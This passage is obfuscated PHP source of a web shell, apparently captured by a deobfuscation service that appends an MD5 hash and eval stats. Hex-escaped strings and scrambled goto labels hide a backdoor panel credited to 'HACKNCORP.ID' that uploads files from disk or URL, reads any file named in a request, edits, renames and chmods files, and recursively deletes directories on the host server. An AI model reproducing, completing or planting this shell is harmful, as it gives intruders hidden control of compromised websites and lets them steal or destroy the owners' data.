"\40\x5d\12\x3c\x69\x6e\x70\x75\164\x20\164\x79\x70\145\75\42\162\x61\144\151\x6f\x22\40\166\x61\154\x75\145\75\42\62\x22\40\x6e\141\x6d\145\x3d\x22\x64\x69\162\156\171\x61\42\x20\x3e\144\157\143\165\x6d\145\x6e\164\x5f\x72\157\157\x74\x20\133\x20" . cekroot() . "\40\135\xa\74\142\x72\x3e\xa\x3c\151\156\x70\165\x74\40\x74\x79\x70\145\x3d\42\x68\151\144\x64\145\156\x22\40\156\141\155\x65\x3d\x22\x75\160\167\x6b\167\153\x22\40\x76\141\x6c\x75\145\75\x22\x61\x70\154\x6f\x64\x22\x3e\12\74\151\156\160\x75\164\x20\164\x79\x70\145\x3d\42\x66\151\154\x65\x22\40\x6e\141\x6d\x65\x3d\x22\x62\145\x72\153\x61\x73\42\76\74\151\156\160\x75\x74\40\x74\171\160\145\x3d\x22\163\165\142\x6d\151\164\42\40\156\141\x6d\145\x3d\x22\142\145\162\x6b\141\163\156\x79\x61\42\x20\x76\141\x6c\165\x65\x3d\42\125\x70\154\157\141\x64\42\40\x63\x6c\x61\163\163\x3d\42\x75\160\42\40\x73\164\171\154\x65\x3d\x22\x63\x75\162\x73\x6f\x72\x3a\40\x70\157\x69\x6e\x74\x65\x72\73\40\x62\157\x72\144\145\x72\55\143\157\154\157\162\x3a\x20\43\x66\146\146\x22\x3e\x3c\x62\x72\76\xa\x3c\x69\156\x70\x75\x74\40\x74\x79\x70\x65\75\42\x74\145\x78\x74\42\40\156\141\x6d\x65\x3d\x22\144\141\x72\151\154\x69\x6e\x6b\x22\x20\143\154\141\x73\163\x3d\42\165\x70\42\40\160\x6c\x61\x63\x65\150\157\154\x64\145\x72\75\x22\114\x69\x6e\x6b\40\106\151\x6c\x65\42\76\46\x6e\142\x73\x70\x3b\74\151\156\x70\165\164\x20\164\x79\x70\x65\x3d\42\164\x65\x78\164\42\40\156\141\x6d\x65\75\42\156\141\x6d\141\154\x69\x6e\x6b\x22\40\x63\154\x61\163\x73\x3d\x22\x75\160\x22\40\x73\x69\172\x65\75\42\65\42\40\160\x6c\141\x63\x65\x68\x6f\154\x64\x65\x72\75\x22\x66\x69\x6c\145\56\164\x78\x74\42\x3e\x3c\x69\x6e\x70\x75\164\x20\164\x79\160\x65\75\42\x73\165\142\x6d\151\x74\42\40\156\x61\155\145\75\42\x6c\151\x6e\153\x6e\171\x61\x22\40\143\x6c\x61\163\x73\x3d\42\x75\160\42\40\166\141\154\x75\145\x3d\42\125\160\154\157\141\x64\42\x20\x73\x74\x79\x6c\x65\75\42\x63\x75\162\163\157\x72\x3a\40\160\x6f\x69\x6e\164\145\x72\x3b\40\x62\157\x72\144\145\x72\55\143\x6f\x6c\x6f\x72\x3a\x20\43\146\146\x66\x22\76\xa\x3c\x2f\x63\x65\156\164\x65\x72\x3e\12\x3c\x2f\146\x6f\x72\x6d\76"; goto yTH2m; qdTCi: $lokasi = str_replace("\x5c", "\57", $lokasi); goto GnnL3; oPKxL: $disfunc = @ini_get("\144\151\x73\141\x62\154\145\x5f\x66\165\x6e\x63\164\x69\x6f\156\x73"); goto La4om; jyBT8: function author() { echo "\x3c\x63\145\156\x74\145\x72\x3e\x3c\x62\x72\76\x43\117\120\131\122\111\x47\x48\124\40\46\143\x6f\160\x79\40\74\x61\40\164\141\x72\147\145\x74\x3d\47\137\x62\x6c\x61\156\x6b\47\40\x68\162\145\146\x3d\x27\x68\164\x74\x70\163\x3a\57\57\150\x61\143\153\156\x63\x6f\162\160\56\151\144\x2f\x27\x3e\110\101\103\x4b\116\103\117\x52\120\x2e\x49\x44\74\x2f\x61\76\x3c\57\143\145\156\x74\x65\162\x3e"; die; } goto spDvV; tZbA7: function xrmdir($dir) { $items = scandir($dir); foreach ($items as $item) { if ($item === "\x2e" || $item === "\x2e\x2e") { continue; } $path = $dir . "\x2f" . $item; if (is_dir($path)) { xrmdir($path); } else { unlink($path); } } rmdir($dir); } goto CRstk; gvQv_: echo "\104\x69\x72\145\x63\x74\x6f\x72\171\40\72\40\46\156\142\x73\x70\73"; goto bAsUf; g0A7K: $options = array("\150\x74\164\160" => array("\x6d\x65\164\x68\157\x64" => "\x50\117\x53\x54", "\150\145\141\x64\x65\x72" => "\x43\157\x6e\164\x65\156\164\x2d\164\171\160\x65\72\x20\141\x70\x70\x6c\x69\x63\141\164\x69\x6f\156\x2f\170\55\167\167\167\x2d\x66\x6f\162\x6d\x2d\x75\162\x6c\x65\x6e\143\157\144\x65\x64", "\143\x6f\156\x74\x65\156\164" => http_build_query($data))); goto sMpwZ; pR3me: echo "\x44\151\163\x61\142\x6c\145\x20\106\165\x6e\x63\164\x69\x6f\156\x20\x3a\x20" . $disf . "\x3c\x2f\x66\157\x6e\164\x3e\74\x62\162\x3e"; goto gvQv_; HhzL8: if (isset($_GET["\x66\151\x6c\145\154\157\143"])) { echo "\74\164\x72\76\74\164\x64\76\103\x75\x72\162\x65\156\x74\40\x46\151\154\x65\x20\x3a\40" . $_GET["\x66\x69\154\145\154\157\143"]; echo "\x3c\57\164\x72\x3e\74\57\x74\144\76\74\x2f\x74\x61\142\154\145\76\x3c\x62\x72\57\76"; echo "\74\x70\162\145\76" . htmlspecialchars(file_get_contents($_GET["\146\x69\154\145\x6c\x6f\143"])) . "\x3c\57\160\162\x65\76"; author(); } elseif (isset($_GET["\160\151\154\x69\x68\x61\x6e"]) && $_POST["\160\x69\x6c\x69\x68"] == "\x68\141\160\165\x73") { if (is_dir($_POST["\160\x61\x74\150"])) { xrmdir($_POST["\x70\141\164\x68"]); if (file_exists($_POST["\160\141\164\x68"])) { red("\106\141\x69\154\x65\x64\x20\x74\x6f\40\x64\x65\x6c\145\x74\145\x20\104\x69\162\145\x63\x74\157\x72\x79\x20\x21"); } else { green("\104\145\154\x65\x74\145\x20\x44\151\x72\145\143\164\157\162\171\40\x53\165\x63\143\x65\x73\x73\x20\41"); echo "\163\x74\x72\x69\156\x67"; } } elseif (is_file($_POST["\x70\141\x74\x68"])) { @unlink($_POST["\160\x61\164\x68"]); if (file_exists($_POST["\x70\x61\x74\x68"])) { red("\106\141\151\154\145\144\x20\164\x6f\x20\104\x65\154\x65\164\x65\40\106\151\x6c\x65\x20\41"); } else { green("\104\145\x6c\145\164\x65\40\x46\x69\x6c\x65\x20\123\165\x63\143\x65\x73\x73\40\41"); } } } elseif (isset($_GET["\x70\151\x6c\x69\150\x61\x6e"]) && $_POST["\160\151\154\x69\150"] == "\165\x62\141\x68\x6d\x6f\144") { echo "\x3c\143\145\156\x74\145\162\76" . $_POST["\x70\141\164\150"] . "\74\x62\162\x3e"; echo "\74\x66\x6f\162\x6d\x20\155\145\164\150\157\x64\75\42\160\x6f\x73\x74\42\x3e\12\11\120\145\x72\x6d\151\x73\x73\x69\157\156\40\x3a\x20\x3c\x69\156\x70\165\164\x20\156\141\155\145\x3d\x22\160\x65\162\x6d\x22\40\x74\x79\160\x65\75\x22\x74\x65\x78\x74\42\x20\x63\x6c\141\x73\163\75\42\165\x70\x22\40\163\x69\172\145\x3d\x22\64\x22\40\166\141\x6c\x75\145\75\x22" . substr(sprintf("\45\157", fileperms($_POST["\x70\141\x74\x68"])), -4) . "\x22\40\x2f\x3e\xa\11\74\151\156\x70\x75\x74\40\164\x79\160\145\x3d\x22\x68\151\144\x64\145\x6e\42\x20\x6e\141\x6d\145\x3d\42\160\x61\x74\150\x22\x20\166\141\154\x75\145\x3d\x22" . $_POST["\160\x61\164\150"] . "\42\x3e\12\x9\x3c\151\x6e\160\x75\x74\x20\164\171\x70\145\x3d\42\150\x69\x64\x64\145\156\42\x20\156\x61\x6d\x65\x3d\x22\x70\x69\x6c\x69\150\42\x20\x76\141\154\165\x65\75\x22\165\x62\141\x68\155\x6f\x64\x22\76\xa\11\74\151\156\160\165\x74\40\164\x79\160\145\75\42\x73\165\x62\155\x69\x74\x22\x20\166\141\154\x75\x65\x3d\42\x43\x68\141\156\x67\145\x22\40\156\x61\x6d\145\x3d\x22\x63\150\155\x30\144\x22\40\143\154\x61\163\x73\75\x22\165\x70\x22\40\163\164\x79\x6c\145\x3d\42\143\165\162\x73\157\162\x3a\40\160\x6f\x69\x6e\164\145\162\73\x20\x62\157\x72\x64\x65\162\55\143\157\x6c\x6f\x72\72\40\x23\60\65\x61\x31\70\x31\x22\57\x3e\xa\11\x3c\57\146\x6f\x72\155\x3e"; if (isset($_POST["\x63\150\155\x30\144"])) { $cm = @chmod($_POST["\160\x61\x74\x68"], $_POST["\x70\145\162\x6d"]); if ($cm == true) { green("\103\x68\x61\156\x67\x65\40\x4d\157\x64\40\123\x75\x63\143\145\x73\x73\x20\x21"); } else { red("\x43\x68\141\156\147\145\x20\115\x6f\x64\40\106\141\151\154\145\144\x20\x21"); } } } elseif (isset($_GET["\160\151\x6c\x69\x68\141\x6e"]) && $_POST["\160\151\154\151\150"] == "\147\141\x6e\164\x69\156\141\155\141") { if (isset($_POST["\x67\141\156\164\151\156"])) { $ren = @rename($_POST["\x70\x61\164\150"], $_POST["\156\x65\x77\156\x61\x6d\x65"]); if ($ren == true) { green("\103\x68\x61\156\147\145\x20\x4e\x61\155\145\40\123\165\143\143\145\163\163\40\x21"); } else { red("\x43\150\141\156\x67\145\40\x4e\141\x6d\x65\x20\x46\x61\151\x6c\x65\144\40\x21"); } } if (empty($_POST["\156\x61\155\x65"])) { $namaawal = $_POST["\156\145\x77\156\141\155\145"]; } else { $namawal = $_POST["\156\x61\x6d\145"]; } echo "\74\143\x65\x6e\x74\x65\162\76" . $_POST["\x70\141\x74\x68"] . "\x3c\x62\162\76"; echo "\x3c\x66\157\162\x6d\40\x6d\x65\x74\x68\x6f\144\x3d\x22\160\157\163\x74\x22\76\12\x9\116\145\167\40\116\x61\x6d\x65\40\x3a\x20\x3c\151\156\160\x75\x74\40\156\x61\155\145\75\x22\156\145\167\x6e\141\x6d\x65\x22\40\x74\x79\160\145\75\42\164\145\170\164\42\x20\x63\154\x61\163\163\75\x22\x75\x70\42\x20\163\151\x7a\145\x3d\42\62\60\42\40\x76\141\154\165\145\75\42" . $namaawal . "\42\x20\57\x3e\xa\11\x3c\151\x6e\160\165\164\x20\164\x79\160\x65\x3d\x22\150\151\144\144\145\x6e\42\40\x6e\141\x6d\x65\75\42\160\141\x74\x68\x22\40\166\x61\x6c\165\x65\x3d\x22" . $_POST["\160\x61\x74\x68"] . "\42\x3e\xa\11\74\151\x6e\x70\x75\x74\x20\x74\171\x70\145\75\x22\x68\x69\x64\144\145\156\42\x20\x6e\141\155\x65\75\x22\x70\151\x6c\x69\x68\42\x20\x76\x61\x6c\x75\145\75\42\147\141\156\164\151\x6e\141\x6d\x61\42\76\xa\x9\x3c\x69\156\160\x75\x74\x20\164\x79\160\x65\x3d\42\163\165\x62\x6d\x69\164\42\40\x76\x61\154\x75\x65\x3d\x22\103\150\141\156\147\145\x22\40\156\141\x6d\x65\x3d\x22\x67\x61\x6e\x74\x69\x6e\42\x20\143\154\x61\x73\163\75\x22\165\160\42\x20\x73\x74\x79\x6c\x65\75\42\143\x75\x72\x73\157\x72\x3a\x20\160\x6f\x69\x6e\164\x65\x72\x3b\x20\142\157\x72\x64\145\162\x2d\143\x6f\x6c\157\162\72\40\43\x30\x35\x61\61\x38\x31\42\x2f\76\12\x9\74\57\146\157\162\155\x3e"; } elseif (isset($_GET["\x70\x69\154\x69\x68\x61\x6e"]) && $_POST["\x70\x69\154\151\150"] == "\145\144\x69\x74") { if (isset($_POST["\147\141\163\x65\144\x69\164"])) { $edit = @file_put_contents($_POST["\x70\x61\164\150"], $_POST["\163\x72\x63"]); if ($edit == true) { green("\x45\x64\151\x74\x20\x46\x69\154\145\40\123\x75\x63\x63\x65\163\163\40\41"); } else { red("\x45\x64\151\164\x20\x46\151\154\145\40\x46\x61\151\154\145\x64\40\x21"); } } echo "\74\143\145\x6e\164\145\162\x3e" . $_POST["\x70\141\x74\x68"] . "\74\x62\162\76\74\x62\x72\x3e"; echo "\74\146\x6f\x72\155\x20\x6d\145\x74\x68\157\x64\x3d\x22\160\x6f\163\164\x22\x3e\12\x9\74\164\x65\x78\164\x61\x72\145\141\x20\143\157\154\x73\75\x38\x30\x20\x72\157\167\x73\x3d\62\x30\x20\x6e\141\155\x65\75\x22\x73\162\x63\x22\x3e" . htmlspecialchars(file_get_contents($_POST["\160\141\x74\150"])) . "\74\x2f\164\145\170\x74\141\162\145\x61\x3e\74\x62\x72\76\12\x9\x3c\151\x6e\x70\x75\x74\40\164\x79\x70\x65\x3d\42\x68\151\x64\144\x65\x6e\42\40\156\x61\x6d\145\75\42\x70\141\164\150\42\x20\x76\141\x6c\x75\x65\x3d\42" . $_POST["\x70\x61\x74\x68"] . "\x22\76\12\x9\74\x69\156\160\x75\164\40\x74\x79\160\x65\75\x22\x68\151\x64\x64\145\x6e\x22\x20\x6e\x61\x6d\145\75\x22\160\151\154\151\150\42\x20\166\x61\154\x75\x65\75\x22\x65\144\151\x74\x22\x3e\12\11\74\x69\156\160\x75\x74\x20\164\171\x70\145\75\x22\163\x75\x62\155\151\x74\42\40\x76\x61\x6c\165\x65\75\x22\x45\144\x69\x74\40\106\x69\154\145\x22\40\156\141\155\x65\75\x22\x67\141\163\x65\x64\151\164\42\x20\x2f\76\xa\x9\74\57\146\x6f\x72\155\76\x3c\x62\x72\x3e"; } goto v9NDe; TiIoC: author(); goto Qnf71; DAH4_: ?>

Function Calls

None

Variables

None

Stats

MD5 604d4969ea75f1a2a51a099d91e6f71d
Eval Count 0
Decode Time 81 ms